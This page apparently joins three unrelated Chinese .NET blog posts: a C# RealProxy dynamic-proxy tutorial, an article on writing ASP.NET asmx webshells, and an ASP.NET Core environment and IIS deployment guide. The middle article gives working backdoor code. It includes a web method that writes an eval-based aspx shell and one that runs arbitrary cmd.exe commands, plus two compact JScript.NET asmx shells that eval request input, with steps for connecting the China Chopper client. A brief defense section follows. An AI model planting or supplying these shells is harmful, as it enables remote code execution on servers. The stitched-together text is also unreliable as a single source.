因最近工作需要一个动态的权限配置功能,具体实现逻辑是c#的动态代理功能,废话不多说,直接干货。
需求:

  1. 用户分为管理员、普通用户
  2. 不同用户拥有不同功能权限
  3. 用户的权限可配置
  4. 新增功能时,不用修改权限配置功能

从本篇开始我们使用动态代理完成一个案例,包含动态权限控制的核心功能。

  • c# 如何实现动态代理

c#实现动态代理可以使用.net framework 中提供的RealProxy类。

可以看到RealProxy是一个抽象类,其中Invoke是必须要重写的,我们尝试重写下RealProxy。

复制代码
   public class Proxy : RealProxy
    {
        public Proxy(Type t) : base(t)
        {
     
        }

        public override IMessage Invoke(IMessage msg)
        {
            throw new NotImplementedException();
        }
    }
复制代码

现在我们拥有自己的代理类了,我们需要一个“被代理”的对象,于是。

复制代码
   //被代理的类一定要继承自MarshalByRefObject
    public class Plane : MarshalByRefObject
    {
        public void Fly()
        {
            Console.WriteLine("fly");
        }
    }
复制代码

准备工作都做完了,究竟要如何实现代理,我们可以通过RealProxy的GetTransparntProxy()方法来实现。

于是

复制代码
     static void Main(string[] args)
        {
            Proxy proxy = new Proxy(typeof(Plane), new Plane());
            Plane plane = (Plane)proxy.GetTransparentProxy();
            plane.Fly();
        }
 
复制代码

接下来调试运行,代码执行到fly()方法,在invoke方法抛出异常,可以看出在msg参数中找到我们执行的方法信息与参数。代理模式的原理就是如此,通过代理类的代理方法去执行被代理类的方法。

 

 接下来我们利用msg的参数信息去调用fly()方法。

复制代码
    public class Proxy : RealProxy
    {
        public Plane instance = null;
        public Proxy(Type t, Plane plane) : base(t)
        {
            this.instance = plane;
        }
        public override IMessage Invoke(IMessage msg)
        {
            Console.WriteLine("代理方法");
            var methodCall = (IMethodCallMessage)msg;
            var result = methodCall.MethodBase.Invoke(instance, methodCall.Args);
            return new ReturnMessage(result, null, 0, methodCall.LogicalCallContext, methodCall);
        }

    }
复制代码

运行结果

好了,我们可以看到代理方法已经生效了,这也是最最核心的功能。

源码网盘地址

 

 

探索基于.NET下实现一句话木马之asmx篇

 

0x01 前言

上篇介绍了一般处理程序(ashx)的工作原理以及实现一句话木马的过程,今天接着介绍Web Service程序 (asmx)下的工作原理和如何实现一句话木马,当然介绍之前笔者找到了一款asmx马儿 https://github.com/tennc/webshell/blob/master/caidao-shell/customize.asmx ,依旧是一个大马如下图

 

这个还只是对客户端的菜刀做了适配可用,暂时不符合一句话木马的特点哈,至于要打造一款居家旅行必备的菜刀马,还得从原理上搞清楚 asmx的运行过程。

0x02 简介和原理

Web Service是一个基于可编程的web的应用程序,用于开发分布式的互操作的应用程序,也是一种web服务,Web Service的主要目标是跨平台的可互操作性,为了实现这一目标Web Service 完全基于XML(可扩展标记语言)、XSD(XML Schema)等独立于平台、独立于软件供应商的标准,是创建可互操作的、分布式应用程序的新平台。简单的来说Web Service具备三个要素SOAP(Simple Object Access Protocol)、WSDL(WebServicesDescriptionLanguage)、UDDI(UniversalDescriptionDiscovery andIntegration)之一, SOAP用来描述传递信息的格式, WSDL 用来描述如何访问具体的接口, UDDI用来管理,分发查询webService ,也因此使用Web Service有许多优点,例如可以跨平台工作、部署升级维护起来简单方便、实现多数据多个服务的聚合使用等等。再结合下图说明一下WebService工作的流程

无论使用什么工具、语言编写 WebService,都可以使用 SOAP 协议通过 HTTP 调用,创建 WebService 后,任何语言、平台的客户都可以阅读 WSDL 文档来调用 WebService ,同时客户端也可以根据 WSDL 描述文档生成一个 SOAP 请求信息并发送到Web服务器,Web服务器再将请求转发给 WebService 请求处理器。

对于.Net而言,WebService请求处理器则是一个 .NET Framework 自带的 ISAPI Extension。Web请求处理器用于解析收到的SOAP请求,调用 WebService,然后生成相应的SOAP应答。Web服务器得到SOAP应答后,在通过HTTP应答的方式将其返回给客户端,但WebService也支持HTTP POST请求,仅需要在服务端增加一项配置即可。

 

0x03 一句话的实现

3.1、WebMethod

在Web Service程序中,如果一个公共方法想被外界访问调用的话,就需要加上WebMethod,加上[WebMethod]属性的公有方法就可以被访问,而没有加这个属性的方法就是不能被访问的。将 WebMethod 属性 (Attribute) 附加到 Public 方法表示希望将该方法公开为 XML Web services 的一部分,它具备6个属性:Description 、EnableSession、MessageName、TransactionOption、CacheDuration、BufferResponse,为了更清晰的表述WebService请看下面这段代码

这里声明成一个字符串类型的公共方法HelloWorld,如果此时在方法体内实现创建aspx文件,保存内容为一句话小马的话那么这个WebService就变成了服务后门,依照这个推理就产生了C#版本的WebService小马,实现了两个功能,一个是创建文件,还有一个是执行CMD命令,核心代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
[System.ComponentModel.ToolboxItem( false )]
         [WebMethod]
         /**
         Create A BackDoor
         **/
         public  string  webShell()
         {
             StreamWriter wickedly = File.CreateText(HttpContext.Current.Server.MapPath( "Ivan.aspx" ));
             wickedly.Write( "<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"Ivan\"],\"unsafe\");%>" );
             wickedly.Flush();
             wickedly.Close();
             return  "Wickedly" ;
         }
         [WebMethod]
         /**
         Exec Command via cmdShell
        **/
         public  string  cmdShell( string  input)
         {
             Process pr =  new  Process();
             pr.StartInfo.FileName =  "cmd.exe" ;
             pr.StartInfo.RedirectStandardOutput =  true ;
             pr.StartInfo.UseShellExecute =  false ;
             pr.StartInfo.Arguments =  "/c "  + input;
             pr.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
             pr.Start();
             StreamReader osr = pr.StandardOutput;
             String ocmd = osr.ReadToEnd();
             osr.Close();
             osr.Dispose();
             return  ocmd;
         }

知道原理后就开始着手打造菜刀可用的一句话木马,和一般处理程序类似通过Jscript.Net的eval方法去实现代码执行,根据之前的介绍WebMethod有多个属性并且根据微软的官方文档 https://docs.microsoft.com/zh-cn/previous-versions/dotnet/netframework-1.1/1tyazy68%28v%3dvs.80%29 可以得出Jscript.Net中可以使用 WebMethodAttribute 来替代[WebMethod]。

一句话实现的代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<%@ WebService Language= "JScript"  class = "asmxWebMethodSpy" %>
import System;
import System.Web;
import System.IO;
import System.Web.Services;
public  class  asmxWebMethodSpy extends WebService
{      
     WebMethodAttribute function Invoke(Ivan: String) : Void
     {
            var  I = HttpContext.Current;
         var  Request = I.Request;
         var  Response = I.Response;
         var  Server = I.Server;
             Response.Write( "<H1>Just for Research Learning, Do Not Abuse It! Written By <a href='https://github.com/Ivan1ee'>Ivan1ee</a></H1>" );
         eval(Ivan);
     }
}

打开浏览器,测试效果如下

依照SOAP1.1的规范要求,发送请求的数据包就可以实现一句话代码执行,笔者这里还是拿当前的时间作为攻击载荷,如下图

3.2、ScriptMethod

在研究WebMethod的时候,发现VisualStudio有段注释如下图

当客户端请求的方式是AJAX的时候会导入System.Web.Script.Services.ScriptService命名空间,笔者尝试去挖掘一下可能存在的新的攻击点

代码里ResponseFormat表示方法要返回的类型,一般为Json或者XML; UseHttpGet等于true表示前台的ajax是通过GET可以访问此方法,如果前台ajax通过POST,则报错。

根据C#中的代码可知需要配置WebMethod和ScriptMethod才能正常玩转,而在Jscript.Net中实现这两个功能的分类是WebMethodAttribute类和ScriptMethodAttribute类,最终写出一句话木马服务端代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<%@ WebService Language= "JScript"  class = "ScriptMethodSpy" %>
import System;
import System.Web;
import System.IO;
import System.Web.Services
import System.Web.Script.Services
public  class  ScriptMethodSpy extends WebService
{      
     WebMethodAttribute ScriptMethodAttribute function Invoke(Ivan : String) : Void
     {
             var  I = HttpContext.Current;
         var  Request = I.Request;
         var  Response = I.Response;
         var  Server = I.Server;
     Response.Write( "<H1>Just for Research Learning, Do Not Abuse It! Written By <a href='https://github.com/Ivan1ee'>Ivan1ee</a></H1>" );
         eval(Ivan);
     }
}

打开浏览器输入 Response.Write(DateTime.Now) 成功打印出当前时间

可惜的是这种方法不支持.NET  2.0究其原因是using System.Web.Script.Services;这个命名空间并不在System.Web中,而是在ajax扩展中需要额外安装ASP.NET 2.0 AJAX Extensions,所以在2.0的环境下尽量避免使用该方法。

0X04 菜刀连接

菜刀不支持SOAP的方式提交payload,直接连接asmx文件就会出现下图错误

第一种解决方法可以自己写代码实现支持SOAP的客户端,第二种办法参考asmx页面最下方给出的HTTP POST提交方式

本地环境下用菜刀连接没问题,可以正常连接

但通常部署到服务器上可能会遇到下面的提示

多数情况下程序开发者会支持HTTP POST请求,所以对此不必过于担心。还有就是基于优化考虑将asmxWebMethodSpy.asmx进一步压缩体积后只有499个字节,asmxScriptMethodSpy.asmx也只有547个字节。

 

 

0x05 防御措施

通过菜刀连接的方式,添加可以检测菜刀关键特征的规则;对于Web应用来说,尽量保证代码的安全性;对于IDS规则层面来说,上传的时候可以加入WebMethodAttribute等关键词的检测

 

0x06 小结

 还有本文提供了两种方式实现asmx一句话的思路,当然还有更多编写一句话的技巧有待发掘,下次将介绍另外一种姿势,敬请期待;文章的代码片段请参考 https://github.com/Ivan1ee ;

 

0x07 参考链接

 https://docs.microsoft.com/zh-cn/previous-versions/dotnet/netframework-1.1/1tyazy68%28v%3dvs.80%29

https://github.com/tennc/webshell/blob/master/caidao-shell/customize.asmx

https://www.cnblogs.com/bpdwn/p/3479421.html

https://github.com/Ivan1ee

 

 

 

asp.net core 系列 9 环境(Development、Staging 、Production)

一.在asp.net core中使用多个环境

  ASP.NET Core 配置是基于运行时环境, 使用环境变量。ASP.NET Core 在应用启动时读取环境变量ASPNETCORE_ENVIRONMENT,并将该值存储在 IHostingEnvironment.EnvironmentName 中。ASPNETCORE_ENVIRONMENT 可设置为任意值,但框架支持三个值:Development、Staging 和 Production。 如果发布项目未设置 ASPNETCORE_ENVIRONMENT,则默认为 Production (本机vs中项目Properties\launchSettings.json中environmentVariables默认设置的是Development,如果禁用environmentVariables,那默认则为Production)。

  下面是Startup. Configure中的默认实现,本机默认配置的是Development环境。

复制代码
            //如果是Development环境
            if (env.IsDevelopment())
            {
                //当捕获同步和异步系统。管道中的异常实例,并生成HTML错误响应。
                app.UseDeveloperExceptionPage();
            }
            else
            {
                //如果不是Development环境,向管道中添加一个中间件,用于捕获异常、记录异常并进行重置
                app.UseExceptionHandler("/Home/Error");
                app.UseHsts();
            }
复制代码

  

  1.1 Development 模式

         开发环境可以启用不应该在生产中公开的功能, 例如ASP.NET Core 模板在开发环境中启用了开发人员异常页(app.UseDeveloperExceptionPage())。当出现异常时,显示错误页信息如下图所示:

  本地计算机开发环境可以在项目的 Properties\launchSettings.json 文件中设置。 在 launchSettings.json 中设置的环境值替代在系统环境中设置的值。新建的mvc项目默认配置如下:

复制代码
{
  "iisSettings": {
    "windowsAuthentication": false, 
    "anonymousAuthentication": true, 
    "iisExpress": {
      "applicationUrl": "http://localhost:30081",
      "sslPort": 44349
    }
  },
  "profiles": {
    "IIS Express": {
      "commandName": "IISExpress",
      "launchBrowser": true,
      "environmentVariables": {
        "ASPNETCORE_ENVIRONMENT": "Development"
      }
    },
    "MyNetCoreStudy_MVC": {
      "commandName": "Project",
      "launchBrowser": true,
      "applicationUrl": "https://localhost:5001;http://localhost:5000",
      "environmentVariables": {
        "ASPNETCORE_ENVIRONMENT": "Development"
      }
    }
  }
}
复制代码

  launchSettings.json 中的 applicationUrl 属性可指定服务器 URL 的列表。 在列表中的 URL 之间使用分号。注意:launchSettings.json只用于本机在vs 中开发使用,在开发中可以选择三种之中任意一种的环境模式。当项目发布后,发布后(iis做反向代理),发布的文件中并不会有launchSettings.json文件。

  如果不用vs来启动应用程序,使用 dotnet run 命令来 启动应用程序时,使用具有 "commandName": "Project" 的第一个配置文件。 commandName 的值指定要启动的 Web 服务器。 commandName 可为以下任一项:IIS Express、IIS、Project(启动 Kestrel 的项目)。

  当使用dotnet run 启动应用时:1会读取 launchSettings.json中的environmentVariables;2是会显示打印出host 环境。

 

  1.2  Production  模式

         Production 环境应配置为最大限度地提高安全性、性能和应用可靠性。 不同于开发环境的一些通用设置包括:

    (1) 缓存

    (2) 客户端资源被捆绑和缩小,并可能从 CDN (网络分发)提供。

    (3) 已禁用诊断错误页。

    (4) 已启用友好错误页。

    (5) 已启用生产记录和监视。

 

二. 环境设置

   在项目中为测试设置特定环境通常很有用。 如果未设置环境,默认值为 Production,这会禁用大多数调试功能。设置环境的方法取决于操作系统。例如将asp.net core razor项目发布后,部署到IIS上,访问OtherPages/page1时出现异常。此时默认是Production 环境变量,会显示了error页面信息, 表示已启用友好错误页。如下图所示 :

  

  2.1  修改环境变量

    上面讲到,设置环境的方法取决于操作系统:有Azure 应用服务、Windows、macOS、Linux等。每种操作系统上设置环境变量的方法不同,这里不在介绍,具体参考文档。这里就先只介绍在Windows操作系统上以iis做反向代理的配置环境变量。

    在Windows操作系统上配置环境变量方法有很多。当发布后,文件中有一个web.config。这里就介绍下在web.config中设置 ASPNETCORE_ENVIRONMENT 环境变量。使用 web.config 设置 ASPNETCORE_ENVIRONMENT 环境变量后,它的值会替代系统级设置。

复制代码
      <aspNetCore processPath="dotnet" arguments=".\MyNetCoreStudy.dll" stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="InProcess">
        <environmentVariables>
          <environmentVariable name="ASPNETCORE_ENVIRONMENT" value="Development" />
        </environmentVariables>
      </aspNetCore>
复制代码

         此时iis上该项目就是Development开发环境了,再次访问OtherPages/page1时出现异常,此时会捕获同步和异步系统。管道中的异常实例,并生成HTML错误响应。详细异常信息如下图所示:

  

三. 发布到IIS上步骤

  下面简单讲下发布到IIS上的步骤实现:

    (1) 安装好IIS,网上很多参考资料。

    (2)下载dotnet-hosting-2.2.1-win.exe 用于在iis上处理对web服务器的请求。下载地址介绍:

      https://docs.microsoft.com/zh-cn/aspnet/core/host-and-deploy/iis/index?view=aspnetcore-2.2#install-the-net-core-hosting-bundle

      在里面找到“当前 .NET Core 托管捆绑包安装程序(直接下载)”这里进去可以下载到当前版本(aspnetcore-2.2),安装后,在iis模块中能看到AspNetCoreModuleV2。对应发布项目中web.config的<handlers>处理。

     <handlers>
        <add name="aspNetCore" path="*" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
      </handlers>

    (3) 在vs中右击项目发布,选择"iis Ftp" 点击发布。 选择“文件系统”, 目标位置可以选择当前电脑位置如: D:\DonetCoreStudy\IIS

     (4) 在iis这边,添加网站      

    (5) 在应用程序池中对项目(MyNetCoreStudy)  选择无托管代码。

     这样发布到iis上就成功了。

     

四. 基于环境的 Startup 类

   最后在讲下Startup 类约定。当 ASP.NET Core 应用启动时,会启动Startup类。 应用程序可以为不同的环境,单独定义 Startup 类。可以定义例如: StartupDevelopment类、StartupProduction类,Startup类。当程序运行时会选择相应的 Startup 类。 程序会优先考虑名称后缀与当前环境相匹配的类。如果是Developmen环境则程序进入StartupDevelopment类,如果是Production环境则程序进入StartupProduction类。如果找不到匹配的 Startup{EnvironmentName},就会使用 Startup 类。

  基于环境的 Startup 类实现代码如下:

复制代码
  public class StartupDevelopment
    {
        public void ConfigureServices(IServiceCollection services)
        {
            // ...
        }

        public void Configure(IApplicationBuilder app, IHostingEnvironment env)
        {
            // ...
        }
    }

    // Startup class to use in the Production environment
    public class StartupProduction
    {
        public void ConfigureServices(IServiceCollection services)
        {
            //...
        }

        public void Configure(IApplicationBuilder app, IHostingEnvironment env)
        {
            // ...
        }
    }
        
// Fallback Startup class
// Selected if the environment doesn't match a Startup{EnvironmentName} class
public class Startup
{
    public void ConfigureServices(IServiceCollection services)
    {
        //...
    }

    public void Configure(IApplicationBuilder app, IHostingEnvironment env)
    {
        //...
    }
}
复制代码
复制代码
        /// <summary>
        /// 根据环境变量,动态加载Startup的程序集类
        /// </summary>
        /// <param name="args"></param>
        /// <returns></returns>
        public static IWebHostBuilder CreateWebHostBuilder(string[] args)
        {
            var assemblyName = typeof(Startup).GetTypeInfo().Assembly.FullName;

            return WebHost.CreateDefaultBuilder(args)
                .UseStartup(assemblyName);
        }
复制代码

  

参考文献

官方资料:asp.net core 环境